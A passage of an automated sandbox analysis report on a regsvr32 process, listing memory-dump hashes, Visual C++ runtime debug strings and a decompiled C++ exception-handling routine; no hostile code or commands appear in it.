                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                  • Instruction ID: e5161e45e20286f18a7c233b2d95f7c6d50d739ad8bc374cfda940a225cf7d0d
                                                  • Opcode Fuzzy Hash: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                  • Instruction Fuzzy Hash: DD315C305187849BC3999B24C4C925EBEE1FB85399FA0682CF1C3C6264D774C98A8B06
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                  • Instruction ID: e62117077ddfbae32c834d069a9ab80343e2b26cefae081dcf738b8df2b77597
                                                  • Opcode Fuzzy Hash: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                  • Instruction Fuzzy Hash: B22148B56183848BD749DF28D44A41ABBE1FB9C74CF400B6DF4CAAB250D378D649CB4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                  • Instruction ID: 503aa3927fff6e4ad3ec536c6aa42fcab205a0bd32951b21a7cd1c91f46ab624
                                                  • Opcode Fuzzy Hash: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                  • Instruction Fuzzy Hash: 3F2150B46187848BD748DF28C45641ABBE1FB9C358F804B2DF4CAA7350D7789A05CF4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                  • Instruction ID: bec49874bf3906a1a9314e610e6330a75ea1af3aa415f07e7967bd5f7b72e726
                                                  • Opcode Fuzzy Hash: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                  • Instruction Fuzzy Hash: 61215CB16187848BD748DF28D05941FBBE0BB8D358F405B2DF8CAA6351D7789644CB4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                  • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                  • API String ID: 242677333-579931786
                                                  • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                  • Instruction ID: 59d0ad1821d2987490fb14e41c4dc7dbbb96a2632b775096c591c8feb24f6032
                                                  • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                  • Instruction Fuzzy Hash: DF321A3190CA8695EBB0CB18EC543EE73A0F784345FA04125D6CD47AA9DB7EE549CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invoke_watson_if_error$FileModuleName
                                                  • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                  • API String ID: 1949418964-1840610800
                                                  • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                  • Instruction ID: afa63f492d6c70519d8e627b7e85a2bc97528eb7c2a0a9c735d6d19596090ce3
                                                  • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                  • Instruction Fuzzy Hash: 90F1D636609BC694E6B0DB54E8483AEB3E4F389780F604125DACD43BB9DB7ED194CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invoke_watson_if_error$_invalid_parameter
                                                  • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                  • API String ID: 2356156361-2279852085
                                                  • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                  • Instruction ID: 4b7917f2e6131773ed7248c088fbaee50c31bf3d43f4cd1ee6c8c65be3a18826
                                                  • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                  • Instruction Fuzzy Hash: BCC1E77190DBC681EBB48B15E8803EEA3E1F389384F614126E6CD42BB9DB7ED155CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FileHandleWrite
                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                  • API String ID: 3320372497-2837547082
                                                  • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                  • Instruction ID: 0a9042e1a7d7c8a566278db251693fc707392c06de90b0eab8804e289765c981
                                                  • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                  • Instruction Fuzzy Hash: 4C910E31A1CA8685EBA0DB64E8543BE63E0F384784FA04126D6CD47AB9DF3FE545CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                  • API String ID: 2574300362-564504941
                                                  • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                  • Instruction ID: 70a6d76ff3d3819b8955004bde04ce45998dc5e92ad36a3a08ed7dd3d00f33af
                                                  • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                  • Instruction Fuzzy Hash: F051A635A08A8286E7A09B19FC5476E73E4F784B51F609035DACE43A74DF7EE488CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                  • String ID:
                                                  • API String ID: 641786319-0
                                                  • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                  • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                                  • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                  • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 20%
                                                  			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                  				long long _v24;
                                                  				long long _v32;
                                                  				char _v56;
                                                  				long long _v64;
                                                  				long long _v72;
                                                  				char _v80;
                                                  				void* _v88;
                                                  				void* _v96;
                                                  				intOrPtr _v104;
                                                  				void* _v112;
                                                  				intOrPtr _v120;
                                                  				void* _v128;
                                                  				char _v132;
                                                  				char _v136;
                                                  				long long _v144;
                                                  				signed int _v152;
                                                  				char _v160;
                                                  				signed char _v164;
                                                  				signed int _v168;
                                                  				char _v176;
                                                  				char _v184;
                                                  				long long _v192;
                                                  				signed char _v200;
                                                  				long long _v208;
                                                  				signed int _v216;
                                                  				signed int _v224;
                                                  				long long _v232;
                                                  				void* _t222;
                                                  				void* _t244;
                                                  				void* _t295;
                                                  				long long _t302;
                                                  				long long _t303;
                                                  				intOrPtr _t311;
                                                  				long long _t312;
                                                  				long long _t321;
                                                  				intOrPtr _t325;
                                                  				long long _t329;
                                                  				long long _t330;
                                                  				long long _t332;
                                                  
                                                  				_t295 = __rax;
                                                  				_a32 = __r9;
                                                  				_a24 = __r8;
                                                  				_a16 = __rdx;
                                                  				_a8 = __rcx;
                                                  				_v164 = 0;
                                                  				_v152 = 0;
                                                  				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                                  				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                                  				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                                  				r9d = _v168;
                                                  				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                                  				r9d = _v168;
                                                  				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                  				goto 0xf9d34197;
                                                  				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                                  				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                                  				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                                  				goto 0xf9d341b6;
                                                  				_t222 = E000007FE7FEF9D2CF80(_a40);
                                                  				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                                  				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                                  				_t302 = _a8;
                                                  				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                                  				0xf9d24000();
                                                  				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                                  				goto 0xf9d34862;
                                                  				0xf9d24000();
                                                  				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                  				_a8 = _t303;
                                                  				0xf9d24000();
                                                  				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                  				_v164 = 1;
                                                  				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                  				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                                  				goto 0xf9d34295;
                                                  				E000007FE7FEF9D2CF80(_a8);
                                                  				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                                  				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                                  				_t311 = _a8;
                                                  				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                                  				E000007FE7FEF9D2CF80(_t311);
                                                  				0xf9d24000();
                                                  				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                                  				0xf9d24000();
                                                  				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                  				_v144 = _t312;
                                                  				0xf9d24000();
                                                  				 *((long long*)(_t312 + 0x108)) = 0;
                                                  				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                                  				goto 0xf9d34398;
                                                  				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                                  				E000007FE7FEF9D35AB0(1, _a8);
                                                  				E000007FE7FEF9D34870( &_v56, "bad exception");
                                                  				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a180);
                                                  				goto 0xf9d34398;
                                                  				E000007FE7FEF9D2CF50(_t312);
                                                  				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                                  				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                                  				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                                  				if (_a40[3] <= 0) goto 0xf9d3466c;
                                                  				_v216 = _a32;
                                                  				_v224 =  &_v132;
                                                  				_t321 =  &_v136;
                                                  				_v232 = _t321;
                                                  				r9d = _v168;
                                                  				r8d = _a56;
                                                  				E000007FE7FEF9D2EA30(_a16, _a40);
                                                  				_v128 = _t321;
                                                  				goto 0xf9d3447e;
                                                  				_v136 = _v136 + 1;
                                                  				_v128 = _v128 + 0x14;
                                                  				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                                  				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                                  				_t325 = _v128;
                                                  				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                                  				goto 0xf9d3445a;
                                                  				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                  				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                  				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                  				_v120 = _v120 - 1;
                                                  				_t329 = _v112 + 0x14;
                                                  				_v112 = _t329;
                                                  				if (_v120 <= 0) goto 0xf9d34667;
                                                  				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                                  				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                  				_v96 = _t330;
                                                  				E000007FE7FEF9D2E6A0(_t244, _t330);
                                                  				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                  				goto 0xf9d3457e;
                                                  				_v104 = _v104 - 1;
                                                  				_t332 = _v96 + 4;
                                                  				_v96 = _t332;
                                                  				if (_v104 <= 0) goto 0xf9d34662;
                                                  				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                                  				_v88 = _t332 +  *_v96;
                                                  				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                                  				goto 0xf9d3455a;
                                                  				_v152 = 1;
                                                  				_v176 = _a48 & 0x000000ff;
                                                  				_v184 = _v164 & 0x000000ff;
                                                  				_v192 = _a64;
                                                  				_v200 = _a56;
                                                  				_v208 = _v128;
                                                  				_v216 = _v88;
                                                  				_v224 = _v112;
                                                  				_v232 = _a40;
                                                  				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                  				goto 0xf9d34667;
                                                  				goto 0xf9d3455a;
                                                  				goto L1;
                                                  				goto 0xf9d3445a;
                                                  				__eax = _v152 & 0x000000ff;
                                                  				__eflags = _v152 & 0x000000ff;
                                                  				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                                  				__rax = _a40;
                                                  				__eax =  *_a40;
                                                  				__eax =  *_a40 & 0x1fffffff;
                                                  				__eflags = __eax - 0x19930521;
                                                  				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                                  				__rax = _a40;
                                                  				__eflags =  *(__rax + 0x20);
                                                  				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                                  				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                  				_a40 = _a40[8];
                                                  				_v32 = __rax;
                                                  				goto 0xf9d346cb;
                                                  				_v32 = 0;
                                                  				__eflags = _v32;
                                                  				if (_v32 == 0) goto 0xf9d347d7;
                                                  				__rax = _a40;
                                                  				__eflags =  *(__rax + 0x20);
                                                  				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                                  				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                  				_a40 = _a40[8];
                                                  				__rax = __rax + _a40[8];
                                                  				_v24 = __rax;
                                                  				goto 0xf9d34712;
                                                  				_v24 = 0;
                                                  				__rdx = _v24;
                                                  				__rcx = _a8;
                                                  				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                  				__eflags = __al & 0x000000ff;
                                                  				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                                  				__rax = _a16;
                                                  				_v64 = _a16;
                                                  				__r9 =  &_v80;
                                                  				__r8 = _a40;
                                                  				__rdx = _a32;
                                                  				__rcx = _a16;
                                                  				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                                  				_v64 = __rax;
                                                  				_v72 = 0;
                                                  				__eax = _a48 & 0x000000ff;
                                                  				_v200 = __al;
                                                  				__rax = _a32;
                                                  				_v208 = _a32;
                                                  				__rax = _a40;
                                                  				_v216 = _a40;
                                                  				_v224 = 0xffffffff;
                                                  				_v232 = 0;
                                                  				__r9 = _v64;
                                                  				__r8 = _a24;
                                                  				__rdx = _a8;
                                                  				__rcx = _a16;
                                                  				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                  				goto 0xf9d3484c;
                                                  				__rax = _a40;
                                                  				__eflags =  *(__rax + 0xc);
                                                  				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                                  				__eax = _a48 & 0x000000ff;
                                                  				__eflags = _a48 & 0x000000ff;
                                                  				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                                  				__rax = _a64;
                                                  				_v208 = _a64;
                                                  				__eax = _a56;
                                                  				_v216 = _a56;
                                                  				__eax = _v168;
                                                  				_v224 = _v168;
                                                  				__rax = _a40;
                                                  				_v232 = _a40;
                                                  				__r9 = _a32;
                                                  				__r8 = _a24;
                                                  				__rdx = _a16;
                                                  				__rcx = _a8;
                                                  				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                                  				goto 0xf9d3484c;
                                                  				__eax = E000007FE7FEF9D2CF50(__rax);
                                                  				0xf9d24000();
                                                  				__eflags =  *((long long*)(__rax + 0x108));
                                                  				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                                  				goto 0xf9d34862;
                                                  				return E000007FE7FEF9D2CF80(__rax);
                                                  			}










































                                                  0x7fef9d340b0
                                                  0x7fef9d340b0
                                                  0x7fef9d340b5
                                                  0x7fef9d340ba
                                                  0x7fef9d340bf
                                                  0x7fef9d340cb
                                                  0x7fef9d340d0
                                                  0x7fef9d340ea
                                                  0x7fef9d3410b
                                                  0x7fef9d34131
                                                  0x7fef9d34133
                                                  0x7fef9d3414d
                                                  0x7fef9d34152
                                                  0x7fef9d3416f
                                                  0x7fef9d34174
                                                  0x7fef9d34193
                                                  0x7fef9d3419c
                                                  0x7fef9d341ad
                                                  0x7fef9d341af
                                                  0x7fef9d341b1
                                                  0x7fef9d341c4
                                                  0x7fef9d341d6
                                                  0x7fef9d341eb
                                                  0x7fef9d341fc
                                                  0x7fef9d3420d
                                                  0x7fef9d34213
                                                  0x7fef9d34220
                                                  0x7fef9d34226
                                                  0x7fef9d34233
                                                  0x7fef9d34235
                                                  0x7fef9d3423a
                                                  0x7fef9d3423f
                                                  0x7fef9d34246
                                                  0x7fef9d3424e
                                                  0x7fef9d3425a
                                                  0x7fef9d34262
                                                  0x7fef9d34273
                                                  0x7fef9d3428c
                                                  0x7fef9d3428e
                                                  0x7fef9d34290
                                                  0x7fef9d342a3
                                                  0x7fef9d342b1
                                                  0x7fef9d342c2
                                                  0x7fef9d342d3
                                                  0x7fef9d342e4
                                                  0x7fef9d342e6
                                                  0x7fef9d342f3
                                                  0x7fef9d342f5
                                                  0x7fef9d342fa
                                                  0x7fef9d34307
                                                  0x7fef9d3430d
                                                  0x7fef9d34312
                                                  0x7fef9d34319
                                                  0x7fef9d3431e
                                                  0x7fef9d34323
                                                  0x7fef9d34345
                                                  0x7fef9d34347
                                                  0x7fef9d34358
                                                  0x7fef9d34364
                                                  0x7fef9d34378
                                                  0x7fef9d3438c
                                                  0x7fef9d34391
                                                  0x7fef9d34393
                                                  0x7fef9d343a6
                                                  0x7fef9d343b8
                                                  0x7fef9d343cd
                                                  0x7fef9d343de
                                                  0x7fef9d343ef
                                                  0x7fef9d34401
                                                  0x7fef9d3440f
                                                  0x7fef9d3441c
                                                  0x7fef9d34421
                                                  0x7fef9d34429
                                                  0x7fef9d3442e
                                                  0x7fef9d34433
                                                  0x7fef9d3444b
                                                  0x7fef9d34450
                                                  0x7fef9d34458
                                                  0x7fef9d34463
                                                  0x7fef9d34476
                                                  0x7fef9d3448c
                                                  0x7fef9d344a0
                                                  0x7fef9d344a2
                                                  0x7fef9d344b1
                                                  0x7fef9d344b3
                                                  0x7fef9d344b5
                                                  0x7fef9d344c9
                                                  0x7fef9d344dc
                                                  0x7fef9d344ee
                                                  0x7fef9d344fd
                                                  0x7fef9d34501
                                                  0x7fef9d34511
